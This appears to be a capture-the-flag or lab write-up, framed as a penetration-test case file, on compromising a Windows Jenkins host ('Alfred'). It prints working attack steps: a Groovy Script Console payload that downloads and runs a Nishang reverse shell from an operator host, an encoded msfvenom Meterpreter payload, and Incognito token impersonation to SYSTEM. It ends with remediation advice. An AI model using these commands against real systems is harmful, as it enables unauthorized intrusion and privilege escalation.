Jenkins Script Console RCE and Windows token impersonation
Foundations Windows engagement: Jenkins on 8080 with admin:admin accepted Groovy RCE; Nishang reverse shell as bruce; Meterpreter Incognito impersonated BUILTIN\Administrators for SYSTEM-level access.
- Case files
- Jenkins Script Console RCE and Windows token impersonation
Default Jenkins credentials unlocked Script Console RCE. A PowerShell reverse shell upgraded to Meterpreter; SeImpersonatePrivilege plus Incognito completed privilege escalation.
admin:admin authenticated; Groovy downloaded and ran Nishang for a reverse shell.
msfvenom exe downloaded and executed; multi/handler caught Meterpreter.
SeImpersonatePrivilege enabled; impersonate_token BUILTIN\Administrators elevated the session.
Engagement summary
Default Jenkins credentials unlocked Script Console RCE. A PowerShell reverse shell upgraded to Meterpreter; SeImpersonatePrivilege plus Incognito completed privilege escalation.
ALFRED (10.10.219.84) exposed IIS on 80, RDP on 3389, and Jetty/Jenkins on 8080. Jenkins accepted admin:admin. Manage Jenkins → Script Console executed Groovy that launched cmd and later a Nishang Invoke-PowerShellTcp reverse shell as bruce. We upgraded to a Meterpreter payload, loaded Incognito, listed tokens, and impersonated BUILTIN\Administrators — SeImpersonatePrivilege was enabled — then migrated and read the root artifact under System32\config.
Business impact
Default Jenkins credentials are remote code execution on the CI host. Script Console is an intentional RCE surface for authenticated admins. Token impersonation turns service privileges into Administrators. Change defaults, restrict Jenkins to VPN, disable Script Console for non-admins, and harden service accounts against impersonation abuse.
Jenkins login and Script Console
admin:admin authenticated; Groovy downloaded and ran Nishang for a reverse shell.
OPERATOR · JENKINS
savvy@lab:~$ nmap -sV 10.10.219.84
80/tcp open http Microsoft IIS httpd 7.5
8080/tcp open http Jetty 9.4.z-SNAPSHOT (Jenkins)
# http://10.10.219.84:8080 → admin / admin
PAYLOAD
script-console.groovy
cmd = "powershell iex (New-Object Net.WebClient).DownloadString('http://OPERATOR_IP:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress OPERATOR_IP -Port 1234"
println cmd.execute()OPERATOR · SHELL
savvy@lab:~$ python3 -m http.server 8000
savvy@lab:~$ nc -lnvp 1234
PS C:\Users\bruce>
Meterpreter payload upgrade
msfvenom exe downloaded and executed; multi/handler caught Meterpreter.
OPERATOR · MSFVENOM
savvy@lab:~$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=OPERATOR_IP LPORT=5555 -f exe -o shell-test.exe
savvy@lab:~$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > set LPORT 5555
msf6 > run
# on target: DownloadFile shell-test.exe && Start-Process
Meterpreter session 1 opened
Incognito token impersonation
SeImpersonatePrivilege enabled; impersonate_token BUILTIN\Administrators elevated the session.
OPERATOR · INCOGNITO
meterpreter > getuid
Server username: alfred\bruce
meterpreter > load incognito
meterpreter > list_tokens -g
BUILTIN\Administrators
meterpreter > impersonate_token "BUILTIN\\Administrators"
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Remediation
Rotate Jenkins credentials; bind the console to management networks only. Limit Script Console. Run Jenkins under least privilege and monitor for token impersonation.